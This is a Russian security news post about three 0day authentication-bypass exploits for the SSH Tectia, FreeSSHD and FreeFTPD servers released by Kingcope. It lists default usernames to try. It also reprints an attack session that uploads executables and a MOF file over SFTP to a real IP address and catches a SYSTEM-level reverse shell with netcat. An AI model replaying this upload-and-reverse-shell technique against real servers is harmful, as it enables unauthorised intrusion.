Хакер Kingcope опубликовал три 0day-эксплойта, которые позволяют осуществлять вход без пароля на серверы SSH Tectia, FreeSSHD и FreeFTPD.

tectia.zip
FreeSSHD_0day.zip
FreeFTPD_0day_src.zip

Правда, в каждом случае требуется знать имя пользователя, так что нужно предварительно опробовать стандартные варианты:

root
admin
administrator
webadmin
sysadmin
netadmin
guest
user
web
test
ssh
sftp
ftp
и др.

Эксплойты поставляются в виде файлов diff для модификации клиента SSH. Во всех случаях это исключительно маленькие простые модификации.

Например, уязвимость в сервере SSH Tectia всех версий позволяет модифицированному клиенту выполнить функцию SSH USERAUTH CHANGE REQUEST и сменить пароль для любого пользователя.

Уязвимость уже подтверждена независимым исследователем, который опубликовал видео.

Для FreeFTPD хакер Kingcope подготовил целый набор файлов, включая модифицированную версию ssh.exe, ssh.exe, nullevent.exe, nullevent.mof и библиотеку MSVCR100.dll для nullevent.exe. Этот наборчик позволяет проникнуть на сервер в стиле Stuxnet.

Пример сессии:

C:\Users\KC\Desktop\FreeFTPD_0day>sftp -S ./ssh.exe 83.241.214.171
Could not create directory '/home/KC/.ssh'.
The authenticity of host '83.241.214.171 (83.241.214.171)' can't be established.
RSA key fingerprint is a8:ba:6d:0a:c6:ae:8b:a1:b6:47:7b:43:a8:de:4b:8e.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/KC/.ssh/known_hosts).
Connected to 83.241.214.171.
sftp> put nullevent.exe
Uploading nullevent.exe to /nullevent.exe
nullevent.exe                                                                         100% 7168     7.0KB/s   00:00
sftp> put MSVCR100.dll
Uploading MSVCR100.dll to /MSVCR100.dll
MSVCR100.dll                                                                          100%  751KB  22.8KB/s   00:33
sftp> put nullevent.mof wbem/mof/nullevent.mof
Uploading nullevent.mof to /wbem/mof/nullevent.mof
nullevent.mof                                                                         100%  691     0.7KB/s   00:00
sftp>

[root@vs2067037 ~]# nc -v -l 443
Connection from 83.231.224.193 port 443 [tcp/https] accepted
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии